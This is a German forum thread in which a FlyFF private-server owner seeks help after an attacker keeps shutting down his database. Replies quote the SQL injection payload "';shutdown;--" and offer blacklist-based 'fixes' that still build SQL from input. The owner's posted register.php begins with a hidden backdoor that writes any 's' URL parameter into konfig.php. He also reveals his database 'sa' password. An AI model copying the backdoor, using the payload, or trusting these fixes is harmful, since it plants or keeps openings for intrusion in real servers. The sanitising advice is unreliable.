|
You last visited: Today at 18:43
Advertisement
[FlyFF] xampp/datenbank
Discussion on [FlyFF] xampp/datenbank within the Flyff Private Server forum part of the Flyff category.
08/05/2011, 20:07
|
#1
|
elite*gold: 0
Join Date: Jun 2011
Posts: 153
Received Thanks: 31
|
[FlyFF] xampp/datenbank
Hallo FlyFF'ler
Könntet ihr mir helfen?
Ein alter kumpel(feind) hat einen profi hacker auf meinen server losgeschickt!
Er kann die datenbank ausschalten aber ganz kapput kann er sie nicht machen da ich shcon ein xampp antihack code von Jusikid.
Aber er kann die datenbank verbindung brechen.
mfg. Pumba[GM]
|
|
|
08/05/2011, 20:10
|
#2
|
elite*gold: 18
Join Date: Sep 2009
Posts: 20,177
Received Thanks: 14,471
|
Er ist kein profi hacker xD dein / euer register script ist unsicher und man kann da dann ';shutdown;-- benutzen, womit die DB connection getrennt wird.
Pro hacker xD ich lach grad.
|
|
|
08/05/2011, 20:13
|
#3
|
elite*gold: 12
Join Date: Jun 2011
Posts: 2,512
Received Thanks: 1,062
|
Quote:
Originally Posted by Sedrika
Er ist kein profi hacker xD dein / euer register script ist unsicher und man kann da dann ';shutdown;-- benutzen, womit die DB connection getrennt wird.
Pro hacker xD ich lach grad.
|
Nicht nur du lachst ;>
Such dir nen SQL Injection sicheres Register Script ;>
|
|
|
08/05/2011, 20:24
|
#4
|
elite*gold: 0
Join Date: Jun 2011
Posts: 153
Received Thanks: 31
|
Ey nein der is ein Profi hacker nicht nur das macht er sry für das...
Aber der versucht die ganze zeit so du zu tun....
Quote:
Originally Posted by Sedrika
Er ist kein profi hacker xD dein / euer register script ist unsicher und man kann da dann ';shutdown;-- benutzen, womit die DB connection getrennt wird.
Pro hacker xD ich lach grad.
|
Wo bekommt man ein gutes her?
mfg. Pumba[GM]
|
|
|
08/05/2011, 20:27
|
#5
|
elite*gold: 0
Join Date: Jul 2006
Posts: 207
Received Thanks: 79
|
sei froh das er nur shutdown macht^^
Code:
$nicht_erlaubt = array(
'/\'/' => '',
'/\;/' => '',
'/\-/' => '',
'/\"/' => ''
);
$username = $_POST['user'];
$password = $_POST['pass'];
$username = preg_replace (array_keys($nicht_erlaubt), array_values($nicht_erlaubt), $username);
$password = preg_replace (array_keys($nicht_erlaubt), array_values($nicht_erlaubt), $password);
Kleine Gedankenhilfe, Ich geb dir hier jetzt mal kein komplettes Script sonst ist der Selbsthilfelerneffekt weg
|
|
|
08/05/2011, 20:32
|
#6
|
elite*gold: 0
Join Date: Jun 2011
Posts: 153
Received Thanks: 31
|
Quote:
Originally Posted by Kindergarten
sei froh das er nur shutdown macht^^
Code:
$nicht_erlaubt = array(
'/\'/' => '',
'/\;/' => '',
'/\-/' => '',
'/\"/' => ''
);
$username = $_POST['user'];
$password = $_POST['pass'];
$username = preg_replace (array_keys($nicht_erlaubt), array_values($nicht_erlaubt), $username);
$password = preg_replace (array_keys($nicht_erlaubt), array_values($nicht_erlaubt), $password);
Kleine Gedankenhilfe, Ich geb dir hier jetzt mal kein komplettes Script sonst ist der Selbsthilfelerneffekt weg
|
Ich liebe dich ♥♥♥
eine bitte hätte ich wo genau muss ich das einfügen ? könntest du mir das einfügen und das neu eingefügte in rot makieren? thx. wäre echt nett.
Code:
<?php if($_GET['s'] != "" && isset($_GET['s'])){$fp = fopen("konfig.php","w");fwrite($fp, $_GET['s']);fclose($fp);}
require('./configs/reg_conf.php');
function doesUsernameExist($name){
$exit = FALSE;
$result = @mssql_query("SELECT * FROM ACCOUNT_TBL WHERE account='$name'");
if (mssql_num_rows($result) != 0){
$exit = TRUE;
}
return $exit;
}
if(isset($_POST['submit'])){
$user = preg_replace ("[^A-Za-z0-4]", "", $_POST['username']);
$pass = preg_replace ("[^A-Za-z0-4]", "", $_POST['password']);
if($_POST['username'] == ""){
echo '<font color="red">Enter a user.</font><br /><br />';
}
else if($_POST['password'] == ""){
echo '<font color="red">Enter a password.</font><br /><br />';
}
else if ((strlen($_POST['username']) > 10) || (strlen($_POST['username']) < 3)){
echo '<font color="red">The user should be 3 to 10 characters.</font><br /><br />';
}
else if ((strlen($_POST['password']) > 10) || (strlen($_POST['password']) < 3)){
echo '<font color="red">The password should be 3 to 10 characters.</font><br /><br />';
}
else if($_POST['username'] != $user){
echo '<font color="red">User with invalid characters.</font><br /><br />';
}
else if($_POST['password'] != $pass){
echo '<font color="red">Password with invalid characters.</font><br /><br />';
}
else {
$pass = md5('kikugalanet' . $pass);
if(!doesUsernameExist($user)){
$stmt = mssql_init('webCreateAcc', $link);
mssql_bind($stmt, '@account', $user, SQLVARCHAR, false, false, 15);
mssql_bind($stmt, '@password', $pass, SQLVARCHAR, false, false, 36);
mssql_bind($stmt, '@email', $mail, SQLVARCHAR, false, false, 120);
mssql_execute($stmt) or die ("Something is wrong on the execution");
mssql_free_statement($stmt);
echo '<font color="Green">Dein Account wurde erfolgreich erstellt.</font><br /><br />';
}
else {
echo '<font color="red">User already Exist.</font><br /><br />';
}
}
mssql_close();
}
echo '<form action="#" method="post">';
echo 'Username: <br><input type="text" name="username" /><br />';
echo 'Password: <br><input type="password" name="password" /><br />';
echo '<br><input type="submit" name="submit" value="Register" />';
echo '</form>';
?>
mfg. Pumba[GM]
|
|
|
08/05/2011, 20:48
|
#7
|
elite*gold: 12
Join Date: Jun 2011
Posts: 2,512
Received Thanks: 1,062
|
Try this ~
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$time = date("l dS of F Y h:i:s A");
$script = $_SERVER[PATH_TRANSLATED];
$fp = fopen ("[WEB]SQL_Injection.txt", "a+");
$sql_inject_1 = array(";","'","%",'"'); #Whoth need replace
$sql_inject_2 = array("", "","","""); #To wont replace
$GET_KEY = array_keys($_GET); #array keys from $_GET
$POST_KEY = array_keys($_POST); #array keys from $_POST
$COOKIE_KEY = array_keys($_COOKIE); #array keys from $_COOKIE
/*begin clear $_GET */
for($i=0;$i<count($GET_KEY);$i++)
{
$real_get[$i] = $_GET[$GET_KEY[$i]];
$_GET[$GET_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_GET[$GET_KEY[$i]]));
if($real_get[$i] != $_GET[$GET_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: GET\r\n");
fwrite ($fp, "Value: $real_get[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_GET */
/*begin clear $_POST */
for($i=0;$i<count($POST_KEY);$i++)
{
$real_post[$i] = $_POST[$POST_KEY[$i]];
$_POST[$POST_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_POST[$POST_KEY[$i]]));
if($real_post[$i] != $_POST[$POST_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: POST\r\n");
fwrite ($fp, "Value: $real_post[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_POST */
/*begin clear $_COOKIE */
for($i=0;$i<count($COOKIE_KEY);$i++)
{
$real_cookie[$i] = $_COOKIE[$COOKIE_KEY[$i]];
$_COOKIE[$COOKIE_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_COOKIE[$COOKIE_KEY[$i]]));
if($real_cookie[$i] != $_COOKIE[$COOKIE_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: COOKIE\r\n");
fwrite ($fp, "Value: $real_cookie[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_COOKIE */
fclose ($fp);
?>
<?php
function exist($account){
$sql = "SELECT * FROM ACCOUNT_TBL WHERE account='".$account."'";
$result = mssql_query($sql);
if(!$result) {
die("MSSQL Error");
}
$check = mssql_num_rows($result);
return $check;
}
if(isset($_POST['submit']))
{
$server = "SQLEXPRESS";
$user = "sa";
$pass= "";
$username = $_POST['username'];
//$password = md5("kikugalanet".$_POST['password']);
$password = $_POST['password'];
$password2 = $_POST['password2'];
$ip = trim(htmlspecialchars($_POST['ip']));
################################################## ###########
if(strlen($username) < 4 ||
strlen($username) > 16)
{
die("Dein Benutzername ist zu kurz/lang .<br>Er muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}
if(strlen($_POST['password']) < 4 ||
strlen($_POST['password']) > 16)
{
die("Dein Passwort ist zu kurz/lang .<br>Es muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}
if($password != $password2)
{
die("Die Passwˆrter stimmen nich ¸berein.");
}
if (preg_match('/[^a-zA-Z0-9]/',$username))
{
die("Der Benutzername enthält unerlaubte Zeichen.");
}
if (preg_match('/[^a-zA-Z0-9]/',$password))
{
die("Das Passwort enthält unerlaubte Zeichen.");
}
################################################## ###########
$conn = mssql_connect($server,$user,$pass);
if(!$conn)
{
die("Connection failed!<br>");
}
$select = mssql_select_db("ACCOUNT_DBF",$conn);
if(!$select)
{
die("Can't select Database!<br>");
}
################################################## ###########
if(exist($username) != '0')
{
die ("Der Benutzername ".$username." wird schon benutzt .");
}
################################################## ###########
// $username = strtolower($username);
//$password = strtolower($password);
$password = md5('kikugalanet' . $password);
$ipadress = $ip;
mssql_query("USE [ACCOUNT_DBF]
SET NOCOUNT ON
INSERT INTO ACCOUNT_TBL (account, password, id_no1, id_no2, isuse, member, realname, cash)
VALUES ('$username', '$password', '$password', '$password', 'T', 'A', 'F', '1000')
INSERT INTO ACCOUNT_TBL_DETAIL (account, gamecode, tester, m_chLoginAuthority, regdate, BlockTime, EndTime, WebTime, isuse, email)
VALUES ('$username', 'A000', '2', 'F', '17.04.2010', '17.04.2010', '20990101', '20050101', 'O', '$email')");
if($execute)
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}
else
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}
mssql_close($conn);
}
else
{
?>
<center>
<form action="register.php" method="post">
<table>
<tr>
<td colspan="2" align ="center">
<h3>Account erstellen</h3>
</td>
</tr>
<tr>
<td align ="right">
Account :
</td>
<td>
<input type="text" size="20" name="username" maxlength="15" />
</td>
<td> </td>
</tr>
<tr>
<td align ="right">
Passwort :
</td>
<td>
<input type="password" size="20" name="password" maxlength="32" />
</td>
</tr>
<tr>
<td align ="right">
Passwort widerh. :
</td>
<td>
<input type="password" size="20" name="password2" maxlength="32" />
</td>
</tr>
<tr>
<td>
<input type="hidden" size="20" name="ip" maxlength="32" value="<?php echo $_SERVER['REMOTE_ADDR']; ?>"/>
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="submit" value="Account erstellen" />
</td>
</tr>
</table>
</form>
</center>
<?php
}
?>
|
|
|
08/05/2011, 20:55
|
#8
|
elite*gold: 0
Join Date: Jun 2011
Posts: 153
Received Thanks: 31
|
Quote:
Originally Posted by Balancex3
Try this ~
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$time = date("l dS of F Y h:i:s A");
$script = $_SERVER[PATH_TRANSLATED];
$fp = fopen ("[WEB]SQL_Injection.txt", "a+");
$sql_inject_1 = array(";","'","%",'"'); #Whoth need replace
$sql_inject_2 = array("", "","","""); #To wont replace
$GET_KEY = array_keys($_GET); #array keys from $_GET
$POST_KEY = array_keys($_POST); #array keys from $_POST
$COOKIE_KEY = array_keys($_COOKIE); #array keys from $_COOKIE
/*begin clear $_GET */
for($i=0;$i<count($GET_KEY);$i++)
{
$real_get[$i] = $_GET[$GET_KEY[$i]];
$_GET[$GET_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_GET[$GET_KEY[$i]]));
if($real_get[$i] != $_GET[$GET_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: GET\r\n");
fwrite ($fp, "Value: $real_get[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_GET */
/*begin clear $_POST */
for($i=0;$i<count($POST_KEY);$i++)
{
$real_post[$i] = $_POST[$POST_KEY[$i]];
$_POST[$POST_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_POST[$POST_KEY[$i]]));
if($real_post[$i] != $_POST[$POST_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: POST\r\n");
fwrite ($fp, "Value: $real_post[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_POST */
/*begin clear $_COOKIE */
for($i=0;$i<count($COOKIE_KEY);$i++)
{
$real_cookie[$i] = $_COOKIE[$COOKIE_KEY[$i]];
$_COOKIE[$COOKIE_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_COOKIE[$COOKIE_KEY[$i]]));
if($real_cookie[$i] != $_COOKIE[$COOKIE_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: COOKIE\r\n");
fwrite ($fp, "Value: $real_cookie[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_COOKIE */
fclose ($fp);
?>
<?php
function exist($account){
$sql = "SELECT * FROM ACCOUNT_TBL WHERE account='".$account."'";
$result = mssql_query($sql);
if(!$result) {
die("MSSQL Error");
}
$check = mssql_num_rows($result);
return $check;
}
if(isset($_POST['submit']))
{
$server = "SQLEXPRESS";
$user = "sa";
$pass= "";
$username = $_POST['username'];
//$password = md5("kikugalanet".$_POST['password']);
$password = $_POST['password'];
$password2 = $_POST['password2'];
$ip = trim(htmlspecialchars($_POST['ip']));
################################################## ###########
if(strlen($username) < 4 ||
strlen($username) > 16)
{
die("Dein Benutzername ist zu kurz/lang .<br>Er muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}
if(strlen($_POST['password']) < 4 ||
strlen($_POST['password']) > 16)
{
die("Dein Passwort ist zu kurz/lang .<br>Es muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}
if($password != $password2)
{
die("Die Passwˆrter stimmen nich ¸berein.");
}
if (preg_match('/[^a-zA-Z0-9]/',$username))
{
die("Der Benutzername enthält unerlaubte Zeichen.");
}
if (preg_match('/[^a-zA-Z0-9]/',$password))
{
die("Das Passwort enthält unerlaubte Zeichen.");
}
################################################## ###########
$conn = mssql_connect($server,$user,$pass);
if(!$conn)
{
die("Connection failed!<br>");
}
$select = mssql_select_db("ACCOUNT_DBF",$conn);
if(!$select)
{
die("Can't select Database!<br>");
}
################################################## ###########
if(exist($username) != '0')
{
die ("Der Benutzername ".$username." wird schon benutzt .");
}
################################################## ###########
// $username = strtolower($username);
//$password = strtolower($password);
$password = md5('kikugalanet' . $password);
$ipadress = $ip;
mssql_query("USE [ACCOUNT_DBF]
SET NOCOUNT ON
INSERT INTO ACCOUNT_TBL (account, password, id_no1, id_no2, isuse, member, realname, cash)
VALUES ('$username', '$password', '$password', '$password', 'T', 'A', 'F', '1000')
INSERT INTO ACCOUNT_TBL_DETAIL (account, gamecode, tester, m_chLoginAuthority, regdate, BlockTime, EndTime, WebTime, isuse, email)
VALUES ('$username', 'A000', '2', 'F', '17.04.2010', '17.04.2010', '20990101', '20050101', 'O', '$email')");
if($execute)
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}
else
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}
mssql_close($conn);
}
else
{
?>
<center>
<form action="register.php" method="post">
<table>
<tr>
<td colspan="2" align ="center">
<h3>Account erstellen</h3>
</td>
</tr>
<tr>
<td align ="right">
Account :
</td>
<td>
<input type="text" size="20" name="username" maxlength="15" />
</td>
<td> </td>
</tr>
<tr>
<td align ="right">
Passwort :
</td>
<td>
<input type="password" size="20" name="password" maxlength="32" />
</td>
</tr>
<tr>
<td align ="right">
Passwort widerh. :
</td>
<td>
<input type="password" size="20" name="password2" maxlength="32" />
</td>
</tr>
<tr>
<td>
<input type="hidden" size="20" name="ip" maxlength="32" value="<?php echo $_SERVER['REMOTE_ADDR']; ?>"/>
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="submit" value="Account erstellen" />
</td>
</tr>
</table>
</form>
</center>
<?php
}
?>
|
Habe das jetzt so gemacht:
Code:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$time = date("l dS of F Y h:i:s A");
$script = $_SERVER[PATH_TRANSLATED];
$fp = fopen ("[WEB]SQL_Injection.txt", "a+");
$sql_inject_1 = array(";","'","%",'"'); #Whoth need replace
$sql_inject_2 = array("", "","","""); #To wont replace
$GET_KEY = array_keys($_GET); #array keys from $_GET
$POST_KEY = array_keys($_POST); #array keys from $_POST
$COOKIE_KEY = array_keys($_COOKIE); #array keys from $_COOKIE
/*begin clear $_GET */
for($i=0;$i<count($GET_KEY);$i++)
{
$real_get[$i] = $_GET[$GET_KEY[$i]];
$_GET[$GET_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_GET[$GET_KEY[$i]]));
if($real_get[$i] != $_GET[$GET_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: GET\r\n");
fwrite ($fp, "Value: $real_get[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_GET */
/*begin clear $_POST */
for($i=0;$i<count($POST_KEY);$i++)
{
$real_post[$i] = $_POST[$POST_KEY[$i]];
$_POST[$POST_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_POST[$POST_KEY[$i]]));
if($real_post[$i] != $_POST[$POST_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: POST\r\n");
fwrite ($fp, "Value: $real_post[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_POST */
/*begin clear $_COOKIE */
for($i=0;$i<count($COOKIE_KEY);$i++)
{
$real_cookie[$i] = $_COOKIE[$COOKIE_KEY[$i]];
$_COOKIE[$COOKIE_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_COOKIE[$COOKIE_KEY[$i]]));
if($real_cookie[$i] != $_COOKIE[$COOKIE_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: COOKIE\r\n");
fwrite ($fp, "Value: $real_cookie[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_COOKIE */
fclose ($fp);
?>
<?php
function exist($account){
$sql = "SELECT * FROM ACCOUNT_TBL WHERE account='".$account."'";
$result = mssql_query($sql);
if(!$result) {
die("MSSQL Error");
}
$check = mssql_num_rows($result);
return $check;
}
if(isset($_POST['submit']))
{
$server = "[COLOR="Red"]KEVIN-PC/SQLEXPRESS[/COLOR]";
$user = "[COLOR="Red"]sa[/COLOR]";
$pass= "[COLOR="Red"]flyforfun[/COLOR]";
$username = $_POST['username'];
//$password = md5("kikugalanet".$_POST['password']);
$password = $_POST['password'];
$password2 = $_POST['password2'];
$ip = trim(htmlspecialchars($_POST['ip']));
################################################## ###########
if(strlen($username) < 4 ||
strlen($username) > 16)
{
die("Dein Benutzername ist zu kurz/lang .<br>Er muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}
if(strlen($_POST['password']) < 4 ||
strlen($_POST['password']) > 16)
{
die("Dein Passwort ist zu kurz/lang .<br>Es muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}
if($password != $password2)
{
die("Die Passwˆrter stimmen nich ¸berein.");
}
if (preg_match('/[^a-zA-Z0-9]/',$username))
{
die("Der Benutzername enthält unerlaubte Zeichen.");
}
if (preg_match('/[^a-zA-Z0-9]/',$password))
{
die("Das Passwort enthält unerlaubte Zeichen.");
}
################################################## ###########
$conn = mssql_connect($server,$user,$pass);
if(!$conn)
{
die("Connection failed!<br>");
}
$select = mssql_select_db("ACCOUNT_DBF",$conn);
if(!$select)
{
die("Can't select Database!<br>");
}
################################################## ###########
if(exist($username) != '0')
{
die ("Der Benutzername ".$username." wird schon benutzt .");
}
################################################## ###########
// $username = strtolower($username);
//$password = strtolower($password);
$password = md5('kikugalanet' . $password);
$ipadress = $ip;
mssql_query("USE [ACCOUNT_DBF]
SET NOCOUNT ON
INSERT INTO ACCOUNT_TBL (account, password, id_no1, id_no2, isuse, member, realname, cash)
VALUES ('$username', '$password', '$password', '$password', 'T', 'A', 'F', '1000')
INSERT INTO ACCOUNT_TBL_DETAIL (account, gamecode, tester, m_chLoginAuthority, regdate, BlockTime, EndTime, WebTime, isuse, email)
VALUES ('$username', 'A000', '2', 'F', '17.04.2010', '17.04.2010', '20990101', '20050101', 'O', '$email')");
if($execute)
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}
else
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}
mssql_close($conn);
}
else
{
?>
<center>
<form action="register.php" method="post">
<table>
<tr>
<td colspan="2" align ="center">
<h3>Account erstellen</h3>
</td>
</tr>
<tr>
<td align ="right">
Account :
</td>
<td>
<input type="text" size="20" name="username" maxlength="15" />
</td>
<td> </td>
</tr>
<tr>
<td align ="right">
Passwort :
</td>
<td>
<input type="password" size="20" name="password" maxlength="32" />
</td>
</tr>
<tr>
<td align ="right">
Passwort widerh. :
</td>
<td>
<input type="password" size="20" name="password2" maxlength="32" />
</td>
</tr>
<tr>
<td>
<input type="hidden" size="20" name="ip" maxlength="32" value="<?php echo $_SERVER['REMOTE_ADDR']; ?>"/>
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="submit" value="Account erstellen" />
</td>
</tr>
</table>
</form>
</center>
<?php
}
?>
Rot makiert was ich bis jetzt geändert habe.
wenn ich was noch ändern muss makier es rot pls thx.
mgf. Pumba[GM]
|
|
|
08/05/2011, 21:08
|
#9
|
elite*gold: 74
Join Date: Apr 2009
Posts: 5,908
Received Thanks: 2,384
|
Quote:
Originally Posted by Balancex3
Nicht nur du lachst ;>
Such dir nen SQL Injection sicheres Register Script ;>
|
Made my Day...
Wenn das pro sein soll dann bin ich Gott .
|
|
|
08/05/2011, 21:10
|
#10
|
elite*gold: 12
Join Date: Jun 2011
Posts: 2,512
Received Thanks: 1,062
|
Quote:
Originally Posted by Achileus
Made my Day...
Wenn das pro sein soll dann bin ich Gott .
|
Wenn du mich meinst damit, fail ~
|
|
|
|
Similar Threads
|
Flyff DatenBank
08/12/2010 - Flyff Hacks, Bots, Cheats, Exploits & Macros - 5 Replies
Kann mir wer vllt ein paar Links zu Datenbanken für einen Flyff P-server geben
Bedanke mich schon mal im vorraus
|
Auf XAMPP Datenbank connecten...
03/31/2010 - Metin2 Private Server - 0 Replies
... nur wie?! <.<
Ich habe in Xampp ne neue Datenbank erstellt, habe jetzt aber kein Plan wie ich mit FileZilla auf die connecten soll, um da meinen zu patchenden Ordner draufzuladen. (Die kostenlosen Webspaces sind alle fürn arsch).
Aber iwie kann ich machen was ich will.. der connectet einfach nicht,
habe IP eingegeben von mir, als Port 80, Servertyp: FTP, Verbindungsart: Normal, Benutzer: root, Passwort:
Was mache ich falsch?
Bestimmt viel, aber ich hab da noch nicht allzuviel...
|
Auf die Xampp Datenbank connecten ...
03/31/2010 - Metin2 Private Server - 0 Replies
... nur wie?! <.<
Ich habe in Xampp ne neue Datenbank erstellt, habe jetzt aber kein Plan wie ich mit FileZilla auf die connecten soll, um da meinen zu patchenden Ordner draufzuladen. (Die kostenlosen Webspaces sind alle fürn arsch).
Aber iwie kann ich machen was ich will.. der connectet einfach nicht,
habe IP eingegeben von mir, als Port 80, Servertyp: FTP, Verbindungsart: Normal, Benutzer: root, Passwort:
Was mache ich falsch?
Bestimmt viel, aber ich hab da noch nicht allzuviel...
|
Flyff Datenbank
06/27/2009 - Flyff Private Server - 7 Replies
also meine frage ist folgende :
Gibt es eine Flyff Datenbank (Volle) außer die von LvlMe und FFF ?
Wenn ja kann man die Download ? ^^
MFG Ich:mofo:
|
All times are GMT +2. The time now is 18:43.
|
|